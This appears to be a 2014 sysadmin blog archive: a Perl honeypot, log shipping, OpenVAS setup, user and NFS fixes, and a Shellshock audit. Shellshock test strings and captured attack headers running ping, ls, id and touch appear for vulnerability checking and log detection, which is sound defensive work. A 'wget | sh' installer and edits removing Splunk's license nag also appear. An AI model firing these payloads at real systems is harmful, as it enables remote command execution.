Friday, December 19, 2014

knock knock, who's there?

sometimes you just want to set up a virtual system to see whether anything is scanning your network.
 
on an ubuntu 14.04 lts server...
   
 # apt-get install build-essential mailutils perl

   
run cpan and install the following dependencies:  
   
 # cpan  
 > install Net::DNS  
 > install Net::Server  
 > install YAML  
 > install MIME::Lite::TT  
 > install Data::Dumper  
 > install Getopt::Long  
 > install Net::IP::Match::Regexp  
 > exit  
   
place honey.pl and honey.conf in /usr/local/bin/honey (or wherever) and do a little ln action:  
   
 # ln -s /usr/local/honey/honey.conf /etc/honey.conf  
   
set background to 1 in honey.conf to make it turn into a background process.  
   
and... when choosing your ports: if any of them is already open when 
honey.pl starts, honey.pl will die. so figure out which ones are in use:  
   
 # netstat -tpln  
   
speaking of which, look at the honey.conf below: we're going to be opening 
scads of ports, so tune the system:  
   
 # ulimit -n 70000  
 # echo "32768 65535" >/proc/sys/net/ipv4/ip_local_port_range  
   
test it; perl -c should report OK:  
   
 # perl -c honey.pl  
   
start with  
 # perl /usr/local/honey.pl --config /etc/honey.conf  
   
if running via /etc/rc.local :  
 # chmod +x /etc/rc.local  
   
add the line before exit 0:  
   
perl /usr/local/honey.pl --config /etc/honey.conf  
   
 ##########  
 # honey.pl  
   
 #!/usr/bin/perl  
 # version 1.3  
 package Honey;  
 use MIME::Lite::TT;  
 use Net::DNS;  
 use strict;  
 use warnings;  
 use Data::Dumper;  
 use base qw(Net::Server::PreForkSimple);  
 use YAML;  
 use Getopt::Long;  
 use Net::IP::Match::Regexp qw( create_iprange_regexp match_ip );  
 sub logger($);  
   
 my $configfile = "./honey.conf";  
 GetOptions ("config=s" => \$configfile);  
 my ($hashref, $arrayref, $string) = YAML::LoadFile( $configfile );  
   
 print Dumper($hashref);  
 my %config = %$hashref;  
   
   
 #############################  
 ### CONFIG   
 #############################  
 my $from_email = $config{'from_email'};  
 my $subject   = $config{'subject'};  
 my $to_email  = $config{'to_email'};  
 my $mailserver = $config{'mailserver'};  
 my $mail_thres = $config{'mail_thres'};  
 my $tempfolder = $config{'tempfolder'};  
 my $lp_ref   = $config{'listenports'};  
 my $background = $config{'background'};  
 my $ih_ref   = $config{'ignorehosts'};  
 my $logpath   = $config{'logpath'};  
   
 unless ( 1 &&  
     defined($from_email) &&   
     defined($subject) &&   
     defined($to_email) &&   
     defined($mailserver) &&   
     defined($mail_thres) &&   
     defined($tempfolder) &&   
     defined($lp_ref) &&   
     defined($background) &&   
     defined($ih_ref) &&   
     1 ) {  
     die "invalid configuration\n";  
 }  
   
 unless (defined($logpath)) {  
     print STDERR "No logpath given, will default to /var/log/honey.log\n";  
     $logpath = "/var/log/honey.log";  
 }  
   
 logger("honey init");  
   
 #############################  
 ### VARS  
 #############################  
 my ($i);  
 my @lports   = @$lp_ref;  
     my @ih     = split(/\s*,\s*/, $ih_ref);   # honey.conf writes "a, b", so tolerate spaces around the commas  
 my $ignorehosts = create_iprange_regexp(@ih);  
 my $tempcache  = $tempfolder . "honeycache";  
 my $tempports  = $tempfolder . "honeyports";  
   
   
 my $template = <<TEMPLATE;  
 Unauthorized connection noted \n\r  
 Connection details: [% connection_string %] \n\r  
 Source details: [% srcip %] ([% srcip_dns %]) \n\r  
 Timestamp: [% timestamp %]  
 TEMPLATE  
   
   
 ############################################  
   
   
 sub post_accept {  
     #print STDERR "post accept in $$\n";  
 }   
   
 sub process_request {  
     my $self = shift;  
   
     #print STDERR "process request in $$\n";  
   
     my $connection_info = $self->{'server'}->{'peeraddr'} . ":" . $self->{'server'}->{'peerport'};  
     $connection_info = $connection_info . " --> " . $self->{'server'}->{'sockaddr'} . ":" . $self->{'server'}->{'sockport'};  
     connection_identified( $self->{'server'}->{'peeraddr'}, $connection_info);  
       
 }  
   
   
 sub connection_identified ($$) {  
     my $srcIP        = $_[0];  
     my $connection_info   = $_[1];  
   
     logger("ok we got a connection from $srcIP");  
   
     # RESTORE HASH  
     my $ref = restore_hash();  
     my %last_email_timestamp = %$ref;  
     my $skip_email = 0;  
   
     # check if we should ignore this IP  
     if (match_ip($srcIP, $ignorehosts)) {  
         logger("ignoring $srcIP!");  
         $skip_email = 1;  
         return 0;  
     }  
   
     # email max every $mail_thres secs   
     my $current_timestamp = time();  
     if (defined($last_email_timestamp{$srcIP})) {  
         logger("We have already seen a connection from the host before");  
       
         my $diff = $current_timestamp - $last_email_timestamp{$srcIP};  
         if ( $diff < $mail_thres) {  
             logger("OK so we saw a connection less than $mail_thres secs ago .. skippin email");  
             $skip_email = 1;  
         } else {  
             logger("but it was a long time ago, diff is $diff");  
         }  
     } else {  
         logger("we have not seen this IP before");  
     }  
     $last_email_timestamp{$srcIP} = $current_timestamp;  
     save_hash(\%last_email_timestamp);  
   
     if ($skip_email) { return; };  
     logger("ok gonna send an email using $mailserver, timeout 60");  
   
     # reverse dns  
     my $srcip_dns = PTR_lookup($srcIP);  
   
     # timestamp  
     my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime(time);  
     my $timestamp = sprintf("%4d-%02d-%02d %02d:%02d:%02d",$year+1900,$mon+1,$mday,$hour,$min,$sec);  # no trailing newline, this lands in the email body  
   
     # SEND EMAIL?  
     my %params;  
     $params{connection_string}  = $connection_info;  
     $params{srcip_dns}   = $srcip_dns;  
     $params{srcip}     = $srcIP;  
     $params{timestamp}   = $timestamp;  
   
     my $msg = MIME::Lite::TT->new(  
       From     => $from_email,  
       To      => $to_email,  
       Subject   => $subject,  
       Template   => \$template,  
       TmplParams  => \%params,  
     );  
   
     $msg->send('smtp', $mailserver, Timeout => 60 );  
     logger("email sent using $mailserver");  
 }  
   
 sub PTR_lookup {  
     my $tname = shift;  
   
     # Net::DNS turns a dotted-quad into its in-addr.arpa name for a PTR query  
     my $res   = Net::DNS::Resolver->new;  
     my $query = $res->query($tname, "PTR");  
   
     if ($query) {  
         foreach my $rr ($query->answer) {  
             next unless $rr->type eq "PTR";  
             return $rr->ptrdname;  
         }  
         # an answer came back but carried no PTR record: fall back to the address  
         return $tname;  
     }  
   
     logger("Reverse lookup query failed for $tname : " . $res->errorstring);  
     return $tname;  
 }  
   
 sub restore_hash() {  
   
     my %thash = ();  
     if (-e $tempcache) {  
         open(FOO,"<$tempcache") or die;  
         foreach my $line (<FOO>) {  
             chomp($line);  
             my ($ip,$time) = split(":",$line);  
             $thash{$ip} = $time;  
         }  
         close(FOO);  
     }  
   
     return \%thash;  
 }  
   
 sub save_hash($) {  
     my $hash_ref = $_[0];  
   
     my %thash = %$hash_ref;  
   
     open(FOO,">$tempcache") or die;  
     foreach my $key (keys %thash) {  
         if (defined($thash{$key})) {  
             print FOO $key . ":" . $thash{$key} . "\n";  
         }  
     }  
     close(FOO);  
   
 }  
   
 sub logger($) {  
     my $message = $_[0];  
   
     # LOG  
     open(POO,">>$logpath") or die;  
     print POO get_date() . ": $message\n";  
     close(POO);   
   
     # STDERR  
     print STDERR get_date() . ": $message\n";  
   
 }  
   
 sub get_date () {  
     my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime(time);  
     my $timestamp = sprintf("%4d-%02d-%02d %02d:%02d:%02d\n",$year+1900,$mon+1,$mday,$hour,$min,$sec);  
     chop($timestamp);  
     return $timestamp;  
 }  
   
   
 open(FOO,">$tempports") or die;  
 foreach my $lport (@lports) {  
       
     if ($lport =~ /(\d+)-(\d+)/) {  
         my $startport = $1;  
         my $stopport = $2;  
         if ($stopport < $startport) { die "Invalid config, check the range\n"; };  
         for ($i=$startport;$i<=$stopport;$i++) {  
             print FOO "port $i\n";  
         }  
     } elsif ($lport =~ /^(\d+)/) {  
         print FOO "port $lport\n";  
     } else {  
         logger("Invalid port $lport specified");  
     }  
 }  
 close(FOO);  
   
 if ($background) {  
     Honey->run(   background => 1,  
         conf_file => "$tempports");  
 } else {  
     Honey->run(conf_file => "$tempports");  
 }  
   
 ##########  
 # honey.conf  
   
 from_email: me@here  
 to_email: you@there  
 mailserver: smtpserver  
 ignorehosts: 10.10.10.10, 0.0.0.0  
 mail_thres: 60  
 tempfolder: /tmp/  
 subject: Unauthorized connection to knockknock  
 background: 1  
 logpath: /var/log/honeylog.log  
 listenports:  
   - 1-21  
   - 23-24  
   - 26-65500  
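a pre-flight check for the "honey.pl will die if a port is already open" problem above, written here as an added python example (it is not part of honey.pl): it expands the listenports ranges from honey.conf the same way honey.pl does, parses netstat -tpln output, and reports the collisions; the conf fragment and the netstat output are constructed samples, and the port total doubles as the file-descriptor floor for the ulimit -n step.

```python
import re
from typing import Dict, List, Tuple

# constructed honey.conf fragment (same ranges as the conf above)
HONEY_CONF = """\
background: 1
listenports:
  - 1-21
  - 23-24
  - 26-65500
logpath: /var/log/honeylog.log
"""

# constructed 'netstat -tpln' output: sshd on 22, postfix on 25 and a forgotten apache on 80
NETSTAT_TPLN = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      912/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1044/master
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1201/apache2
tcp6       0      0 :::22                   :::*                    LISTEN      912/sshd
"""

# one YAML list item: "  - N-M" (range) or "  - N" (single port), same shapes honey.pl accepts
ITEM_RE = re.compile(r'^\s+-\s*(\d+)(?:-(\d+))?\s*$')


def parse_listenports(conf_text: str) -> List[Tuple[int, int]]:
    """Return the listenports list of honey.conf as (low, high) pairs.

    Mirrors honey.pl: 'N-M' is a range, a bare 'N' is a single port, and a
    range whose end is below its start is a config error."""
    ranges: List[Tuple[int, int]] = []
    in_list = False
    for line in conf_text.splitlines():
        if line.startswith("listenports:"):
            in_list = True
            continue
        if not in_list:
            continue
        m = ITEM_RE.match(line)
        if m is None:                      # first non-item line ends the YAML sequence
            break
        lo = int(m.group(1))
        hi = int(m.group(2)) if m.group(2) else lo
        if hi < lo:
            raise ValueError(f"Invalid config, check the range {lo}-{hi}")
        ranges.append((lo, hi))
    return ranges


def total_ports(ranges: List[Tuple[int, int]]) -> int:
    """Number of listening sockets honey.pl will open; each one holds a file
    descriptor, so 'ulimit -n' has to sit above this."""
    return sum(hi - lo + 1 for lo, hi in ranges)


def parse_listening_ports(netstat_text: str) -> Dict[int, str]:
    """Map every TCP port in LISTEN state to its PID/Program name column."""
    listening: Dict[int, str] = {}
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 7 or not parts[0].startswith("tcp") or parts[5] != "LISTEN":
            continue
        port = int(parts[3].rsplit(":", 1)[1])   # works for 0.0.0.0:22 and :::22 alike
        listening.setdefault(port, parts[6])
    return listening


def conflicts(ranges: List[Tuple[int, int]], listening: Dict[int, str]) -> List[Tuple[int, str]]:
    """Ports both configured for honey.pl and already bound: each would kill honey.pl at start."""
    return sorted((port, prog) for port, prog in listening.items()
                  if any(lo <= port <= hi for lo, hi in ranges))


if __name__ == "__main__":
    ranges = parse_listenports(HONEY_CONF)
    print(f"{total_ports(ranges)} ports configured; set ulimit -n above that")
    for port, prog in conflicts(ranges, parse_listening_ports(NETSTAT_TPLN)):
        print(f"port {port} already in use by {prog}: drop it from listenports")
```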
   

apache logs to syslog

the other day i flipped out. well, flipped out in my own quiet way. i heard about some apache access issues and it gave me a slight headache. the super cool thing about linux boxes is that the "truth is in the logs". and i heart logs and log aggregation.

the cool thing about apache is that, if configured correctly, it will log all access and all errors. sadly, apache by default writes its logs on the local system and not via syslog. crap.
i really really don't want to go to each of my boxes and grep through /var/log/apache/blah.txt, so how do i throw the logs across the network?

well, most linux boxes have tee and logger. tee is a nice program that basically says, write this here and there too. logger can send arbitrary data to syslog. yay.

in my enabled site, i changed my ErrorLog and CustomLog sections from this:

 ErrorLog /var/log/apache2/error.log  
 CustomLog /var/log/apache2/access.log combined  

to this:

 ErrorLog "|/usr/bin/tee -a /var/log/apache2/error.log | /usr/bin/logger -thttpd -plocal6.err"  
 CustomLog "|/usr/bin/tee -a /var/log/apache2/access.log | /usr/bin/logger -thttpd -plocal6.notice" combined  

i'm calling local6 and sending it off to syslog tagged httpd. neat.

since i'm using rsyslogd, i edited my /etc/rsyslog.d/50-default conf to pipe my logs off to my remote syslog server:

 auth,authpriv.*;local6.* @remotesyslogserver  

if you'd rather not log to /var/log/syslog, add local6.none to the -/var/log/messages stanza.

reload your daemons and voila.

Wednesday, December 17, 2014

openvas v7 create a new user

well. there are many ways to create a user. this one creates a scanner user, which allows integration with greenbone security desktop.
root@openvas:~#  openvasmd --create-user younotme
User created with password 'd25d4c66-5f7a-4156-84ee-f3ee101381fa'.

root@openvas:~# openvasmd --user=younotme --new-password=notcreatedhere
that was easy.

Monday, December 8, 2014

create a user via commandline in osx

 create a local user with local user group in macos x  
   
 list existing local gids:  
 # dscl . -list /Groups PrimaryGroupID | awk '{print $2}' | sort -n  
   
 for new group, choose numeric id not in list; above 1000 is good.  
 # dscl . -create /Groups/localgroup  
 # dscl . -create /Groups/localgroup PrimaryGroupID 1001  
   
 did you press enter?  
   
 # dscl . -read /Groups/localgroup  
   
 AppleMetaNodeLocation: /Local/Default  
 GeneratedUID: 00A738DA-21B7-4CD2-B5D9-7873C77205D1  
 PrimaryGroupID: 1001  
 RecordName: localgroup 
 RecordType: dsRecTypeStandard:Groups  
   
 list existing local uids:  
 # dscl . -list /Users UniqueID | awk '{print $2}' | sort -n  
   
 for new user, choose numeric id not in the list; above 1000 is good.  
 # dscl . -create /Users/localuser  
 # dscl . -create /Users/localuser UserShell /bin/bash  
 # dscl . -create /Users/localuser RealName "Local Users"  
 # dscl . -create /Users/localuser UniqueID "1001"  
 # dscl . -create /Users/localuser PrimaryGroupID 1001  
 # dscl . -create /Users/localuser NFSHomeDirectory /Users/localuser  
   
 did you really do all that?  
   
 # dscl . -read /Users/localuser  
   
 AppleMetaNodeLocation: /Local/Default  
 NFSHomeDirectory: /Users/localuser  
 GeneratedUID: 47D6D841-C7F1-4962-9F7E-167E8BFC3A91  
 PrimaryGroupID: 1001  
 RealName: localuser  
 RecordName: localuser  
 RecordType: dsRecTypeStandard:Users  
 UniqueID: 1001  
 UserShell: /usr/bash  
   
 create home directory.  
 # mkdir /Users/localuser  
 # chown localuser:localgroup /Users/localuser  
   
 give localuser a password:  
 # passwd localuser  
   
 # su - localuser  
   
 $  
   
 neat!  
   

Friday, December 5, 2014

netapp exports and hate

 i have a netapp on premises.  
it has a couple of vfilers. i wanted to create an additional vfiler. sadly, i couldn't. hate. i hate.
 
i created a volume and i needed to make it have special non-nfsv4 settings cause that's just how the world goes.  

but! for whatever reason the netapp won't let me edit /etc/exports via a mount on a management host. it just won't.  

so, here's what you do, and you'll see why this is a pain.  

ssh root@freakonetapp  

rdfile /etc/exports  

(and out spits a lot of stuff)  

/vol/crap     -sec=sys,rw,root=10.6.6.66,nosuid  
/vol/crap2     -sec=sys,rw,root=10.6.6.66,nosuid  

i need to change /vol/crap2 and add yet another management host.  

so, copy all the lines that spit out on the screen, make your spiffy changes in an editor somewhere and issue:  

wrfile /etc/exports  

(paste the spiffy changes you made in the editor)  

/vol/crap     -sec=sys,rw,root=10.6.6.66,nosuid  
#/vol/crap2     -sec=sys,rw,root=10.6.6.66,nosuid  
/unix-crap     -actual=/vol/crap2,sec=sys,rw,root=10.6.6.66:10.6.66.6,nosuid  

Ctrl-C to end wrfile, and re-export nfs:  

exportfs -a  

Thursday, December 4, 2014

am i slob or am i lazy? let's find -exec chown

 le sigh. LE SIGH. sometimes people like to do things on their own out of expediency or   
 because their local sysadmin is a lazy lazy lazy slob.
  
 i'm not a slob.  

 the issue was that someonenotme updated ubuntu and nfs was broken. or rather,   
 their home dir wasn't mounted.  

 this had been the case for months.   

 sure, i could put this line in /etc/fstab and go my merry way:  

 slobberserver:/home     /home     nfs   rsize=8192,wsize=8192,soft,_netdev   0 0  

 but, i'm not a slob.  

 see that _netdev? that's an awesome directive that says, "hey linuxbox,  
 do not mount me till the network stack is up". awesome.  

 here's what you do:  

 record someonenotme's local system uid & gid  
 # id someonenotme  
 uid=1000(someonenotme) gid=1000(someonenotme)  

 kill all someonenotme processes  
 # kill -9 `ps -ef|grep someonenotme| awk '{print $2}'`  

 really really?  
 # lsof |grep someonenotme  
 ... nada ...  

 ldap & nfs-ize the system  
 # apt-get install nscd autofs ldap-client  

 put all your specially conf'd ldap conf files in /etc  

 refresh the name service  
 # /etc/init.d/nscd restart  

 # id someonenotme  
 uid=15288(someonenotme) gid=101(someonenotme) groups=100(users)  

 edit passwd and change someonenotme's uid and gid to those in ldap.  

 oh, and make sure the homedir matches, too.  
 # vipw  

 now we change all the uids and gids so that someonenotme matches what we have in ldap.  
 to prevent an unfun time, first umount all nfs mounts of interest.  
 # umount /home  

 now we look and change:  
 # find / -uid 1000 -gid 1000 -exec chown 15288:101 {} \;   

 after this is complete, mount -a and go about your business.  

 but wait! you cd'd into their dir, didn't you?  you saw they've done stuff as root 
 in the past.  crud.  why did you ls -la?
 # find /home/someonenotme -uid 0 -gid 0 -exec chown 15288:101 {} \;

 still not a slob.  
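planning the remap before running it, as an added python example (not from the post). it generalises the find -exec chown step above: a file is queued when its uid or its gid matches (the post's find wants both, so a uid 1000 / gid 100 file would be skipped), symlinks are inspected with lstat and never followed, and the walk stays on the starting filesystem, which find / does not do without -xdev. demo_tree() builds a small constructed tree in a temp dir owned by the current user so the plan can be inspected without root.

```python
import os
import tempfile
from typing import List, Tuple

Change = Tuple[str, int, int]   # (path, new uid or -1, new gid or -1), the way os.lchown takes them


def plan_remap(root: str, old_uid: int, old_gid: int,
               new_uid: int, new_gid: int) -> List[Change]:
    """Walk root without following symlinks or crossing filesystems and return the
    chown calls needed to move old_uid -> new_uid and old_gid -> new_gid.
    uid and gid are matched independently, so a file that only matches on gid
    still gets its group fixed (-1 leaves the other half untouched)."""
    plan: List[Change] = []
    root_dev = os.lstat(root).st_dev

    def consider(path: str) -> None:
        st = os.lstat(path)                      # the link itself, not its target
        uid = new_uid if st.st_uid == old_uid else -1
        gid = new_gid if st.st_gid == old_gid else -1
        if uid != -1 or gid != -1:
            plan.append((path, uid, gid))

    consider(root)
    for dirpath, dirnames, filenames in os.walk(root):   # followlinks defaults to False
        keep = []
        for d in dirnames:
            p = os.path.join(dirpath, d)
            if os.path.islink(p):
                consider(p)                      # fix the link's owner, never descend into it
            elif os.lstat(p).st_dev == root_dev:
                consider(p)
                keep.append(d)
            # else: another filesystem (e.g. a still-mounted NFS share), leave it alone
        dirnames[:] = keep
        for f in filenames:
            consider(os.path.join(dirpath, f))
    return plan


def apply_plan(plan: List[Change], dry_run: bool = True) -> int:
    """Print (dry run) or perform the chowns; returns how many entries were handled."""
    for path, uid, gid in plan:
        if dry_run:
            print(f"chown -h {uid}:{gid} {path}")
        else:
            os.lchown(path, uid, gid)
    return len(plan)


def summarize(plan: List[Change], root: str) -> List[Change]:
    """The plan keyed by path relative to root, sorted, for reporting."""
    return sorted((os.path.relpath(p, root), u, g) for p, u, g in plan)


def demo_tree() -> str:
    """Constructed sample: a dir, a file, a subdir and a dangling symlink, all owned
    by the current user (standing in for someonenotme's 1000/1000)."""
    root = tempfile.mkdtemp(prefix="remap-demo-")
    open(os.path.join(root, "notes.txt"), "w").close()
    os.mkdir(os.path.join(root, "sub"))
    open(os.path.join(root, "sub", "deep.txt"), "w").close()
    os.symlink("/nonexistent/target", os.path.join(root, "dangling"))
    return root


def demo(match_uid: bool = True) -> List[Change]:
    """Plan moving the current user's ids to 15288/101 (the ldap ids in the post) over the
    constructed tree; with match_uid=False only the gid half matches, to show the
    independent handling."""
    root = demo_tree()
    old_uid = os.getuid() if match_uid else -2   # -2 never matches a real uid
    return summarize(plan_remap(root, old_uid, os.getgid(), 15288, 101), root)


if __name__ == "__main__":
    root = demo_tree()
    apply_plan(plan_remap(root, os.getuid(), os.getgid(), 15288, 101))   # dry run
```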

Tuesday, November 25, 2014

tell me lies

go ahead. work.
# apt-get install libnss-ldap ldap-utils libsasl2-modules-gssapi-mit heimdal-clients libpam-heimdal
# ldapsearch -h server you.there.com

Monday, November 17, 2014

splunk revelations and dayquil

i am taking dayquil today and somehow i decided to no longer like splunk's nag screen and to no longer like splunk's check for updates feature.

 oh splunk. i love you. but i hate you. i want you to be free, but life is never that nice, is it?  
 here're some useful things for me and me alone.  
 remove splunk trial notifications  
 sure, splunk is free to use with < 500mb/day.  
 by default it has a notification at the top of the gui offering a for-pay license. to remove it,   
 2 lines need to be commented. change these lines in  
 /opt/splunk/lib/python2.5/site-packages/splunk/appserver/oxiclean/SearchService.py:  
 {{{  
     # nagware D) if the user is using a free version of the software -- nag them constantly on every page!  
     if (licenseInfo.find(".//product") != None):  
         productVersion = licenseInfo.find(".//product").text  
         #logger.debug("this is a %s server" % productVersion )  
         if (productVersion == "free"):  
             self.setSystemError("nagwareTime", cli_common.getUILiteral("FREE_VERSION_NAGWARE_STRING") )  
 }}}  
 to:  
 {{{  
     # nagware D) if the user is using a free version of the software -- nag them constantly on every page!  
     if (licenseInfo.find(".//product") != None):  
         productVersion = licenseInfo.find(".//product").text  
         #logger.debug("this is a %s server" % productVersion )  
 #       if (productVersion == "free"):  
 #           self.setSystemError("nagwareTime", cli_common.getUILiteral("FREE_VERSION_NAGWARE_STRING") )  
 }}}  
 do not get smart and do this:  
 {{{  
     # nagware E) if the user is using a free version of the software -- nag them constantly on every page!  
     #logger.debug("checking for nagware state E")  
     if (licenseInfo.find(".//type") != None):  
         productType = licenseInfo.find(".//type").text  
         #logger.debug("this is a %s license" % productType )  
         if (productType == "trial"):  
 #           timeRemainingMessage, licenseState = self.getLicenseTimeRemainingString(licenseInfo)  
 #           self.setSystemError("nagwareTime", timeRemainingMessage )  
 }}}  
 removing splunk update check  
 when splunk starts it looks for updates. stop that, okay?  
 change this line in:  
 /opt/splunk/etc/system/default/web.conf  
 updateCheckerBaseURL = http://quickdraw.splunk.com/js/  
 to:  
 updateCheckerBaseURL = 0  
 howto have splunk listen to arbitrary ports  
 if UDP/TCP 514 are defined in inputs, obviously a daemon running as a non-root user is unable to open those sockets.  
 to open those and any other low port... run splunk as root (say it ain't so).   
 or use iptables and redirect to wherever splunk is listening. gross.   
 or edit syslog's conf file to plop all traffic somewhere and have splunk snarf it up. logrotate. eh.  

Thursday, October 30, 2014

script for centos 7 & openvas 7 install

centos 7 minimal. as in minimal. as in it doesn't even have netstat.

yum update
yum install wget
yum install isomd5sum
wget -q -O - http://www.atomicorp.com/installers/atomic |sh
yum -y install openvas
openvas-setup
systemctl stop firewalld
systemctl disable firewalld
openvas-mkcert-client -n om -i
openvasmd --rebuild
openvasmd

restart all daemons.

tell me sweet lies about arachni, will you?

wget http://downloads.arachni-scanner.com/arachni-0.4.6-0.4.3-linux-x86_64.tar.gz
tar xzvf arachni-0.4.6-0.4.3-linux-x86_64.tar.gz
mv arachni-0.4.6-0.4.3 /usr/local/.
ln -s /usr/local/arachni-0.4.6-0.4.3 /usr/local/arachni
ln -s /usr/local/arachni/bin/arachni* /usr/bin/
ln -s /usr/local/arachni/bin/readlink_f.sh /usr/bin/

Thursday, October 23, 2014

will grep for food

although zless does the job, too.

so. my mx host changed. and you know, a whole lot of my boxes simply do not use a smarthost for mail relay. that's okay. or is it?

not really. because all those hosts need to have their zillion hosts files and bizarro mail conf files updated. and of course i'm not using chef or puppet or using anything sane. who would do that? not me, of course.

but! i do backup etc directories in a central, safe place. i can totally grep them, right? no. they're all compressed.

zless to the rescue!

 #!/bin/bash  
 cd /safe/archive || exit 1  
 # glob instead of parsing ls, and quote the name so odd filenames don't split  
 for i in *.tgz; do  
     echo "$i" >> busted  
     # zless with stdout not a tty just decompresses; grep -a because the tar stream is binary  
     zless "$i" | grep -a oldmailhost >> busted  
 done  

and then, knowing the tgz i can rgrep the snot out of it and find where that string resides. go to said server and grep -r away.

Wednesday, October 15, 2014

i get tired of paths

i do.
 cd /usr/local && tar --strip-components 1 -xzf \  
 /path/to/crap-<version>-<platform>-<arch>.tar.gz  
 plops in local. libs, binaries and all.  

openvas & nasl

 openvas-nasl -d -t mysystem.oh.no -X -T out /var/lib/openvas/plugins/gb_bash_shellshock_remote_cmd_exec_vuln.nasl  
 openvas-nasl -d -t 192.168.6.0/24 -X -T out /var/lib/openvas/plugins/gb_bash_shellshock_remote_cmd_exec_vuln.nasl set key www/80/keepalive -> yes  

esx 5 pubkeys

 To allow SSH access to ESXi/ESX hosts with public/private key authentication:  
   
 1) Generate public/private keys.  
 Notes:  
 These instructions generate two files in ~/.ssh: id_rsa and id_rsa.pub.  
 In ESXi 5.x, the ssh-keygen command is located at /usr/lib/vmware/openssh/bin.  
   
 2) On the remote host, store the public key content (id_rsa.pub) in ~/.ssh/authorized_keys.  
 Notes:  
 For ESXi 5.0, the location of authorized_keys is /etc/ssh/keys-<username>/authorized_keys.  
 More than one key can be stored in this file.  
 To allow root access, change PermitRootLogin no to PermitRootLogin yes in the /etc/ssh/sshd_config file.  
 To disable password login, ensure that ChallengeResponseAuthentication and PasswordAuthentication are set to no.  
   
 3) Reload the service.  
 For ESXi, run the command:  
 /etc/init.d/SSH restart  
 For ESX, run the command:  
 service sshd reload  

Monday, October 13, 2014

the shocker

sure... we have centralized everything. what we sysadmins do have are pubkeys all over the place. so how do we figure out how much of a pain patching the many shellshock and aftershock systems on our networks will be? well crap. first, enumerate: yank the dns zone files, clean them up and feed them into:
shocking.sh  
 #!/bin/bash  
 datestamp=$(date +"%m-%d-%Y")  
 for ip_addr in $(cat strippedzonefile) ; do  
     ping -q -c 1 $ip_addr &&  
     bash -c "  
         echo \" *** $ip_addr *** \" >> output ;  
         scp -B theshocker.sh root@$ip_addr:/root/ >> output ;  
         ssh -v -o ConnectTimeout=1 -o BatchMode=yes -o ConnectionAttempts=1 \  
             -o PasswordAuthentication=no root@$ip_addr \  
             /bin/bash -c /root/theshocker.sh >> output ;  
         echo \"done\"  
     "  
 done  
 cat output | mail -s "shellshock and aftershock report $datestamp" you@somewhere  
which scp's and executes theshocker.sh
 #!/bin/sh  
 SHELLSHOCK=`env x='() { :;}; echo true' /bin/bash -c "" 2>/dev/null`  
 AFTERSHOCK=`env var='() {(a)=>\' /bin/bash -c "echo date | grep -v date" 2>/dev/null`  
 if [ -n "$SHELLSHOCK" ]  
 then  
     echo "cve-2014-6271 vulnerability detected - shellshock"  
 else  
     echo "cve-2014-6271 not detected - shellshock"  
 fi  
 if [ -n "$AFTERSHOCK" ]  
 then  
     echo "cve-2014-7169 vulnerability detected - aftershock"  
 else  
     echo "cve-2014-7169 not detected - aftershock"  
 fi  
which outputs to output:
*** 192.168.6.199 ***
cve-2014-6271 vulnerability detected - shellshock
cve-2014-7169 vulnerability detected - aftershock
 *** 192.168.6.20 ***
 *** 192.168.6.21 ***
you get the picture.

zone file to happy ips

grep -E "192\.168\.(13[6-9]|14[0-2])\.[0-9]{1,3}" db.aname.zone | sort | uniq > finessed

Monday, September 29, 2014

thanks f5

GET / HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: () { :; }; ping -c 17 10.1.1.1
Host:() { :; }; ls -la 
Referer: () { :; }; ping -c 23 10.1.1.1
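detection logic for the headers in this capture, run over apache combined access-log lines that arrived through the tee/logger pipe from the "apache logs to syslog" post above. this is an added python example, not code from either post; the syslog lines are constructed and reuse the header strings shown in the captures on this page.

```python
import re
from typing import Dict, List, Optional

# rsyslog line as written for 'logger -thttpd': "<Mon DD hh:mm:ss> <host> httpd: <apache record>"
SYSLOG_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) httpd: (?P<payload>.*)$')

# Apache 'combined': %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

# a Shellshock payload has to open with a bash function definition: "() {" (whitespace varies)
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# constructed sample: a normal browser hit, two probes carrying the header strings from the
# captures above, and a normal curl fetch
SAMPLE_LOG = """\
Sep 29 11:02:13 web1 httpd: 192.0.2.10 - - [29/Sep/2014:11:02:13 +0000] "GET / HTTP/1.1" 200 4321 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
Sep 29 11:02:14 web1 httpd: 192.0.2.77 - - [29/Sep/2014:11:02:14 +0000] "GET /cgi-bin/valid.cgi HTTP/1.1" 200 512 "() { :; }; ping -c 23 10.1.1.1" "() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`"
Sep 29 11:02:15 web1 httpd: 192.0.2.78 - - [29/Sep/2014:11:02:15 +0000] "GET /cgi-bin/valid.cgi HTTP/1.1" 404 210 "-" "() {test;}; /usr/bin/touch /tmp/VULNERABLE"
Sep 29 11:02:16 web1 httpd: 192.0.2.11 - - [29/Sep/2014:11:02:16 +0000] "GET /index.html HTTP/1.1" 200 1234 "http://www.example.com/" "curl/7.35.0"
"""


def parse_record(line: str) -> Optional[Dict[str, str]]:
    """Peel the syslog prefix off, then split the embedded combined-format record."""
    m = SYSLOG_RE.match(line)
    if m is None:
        return None                      # some other daemon's line, or not tagged httpd
    c = COMBINED_RE.match(m.group("payload"))
    if c is None:
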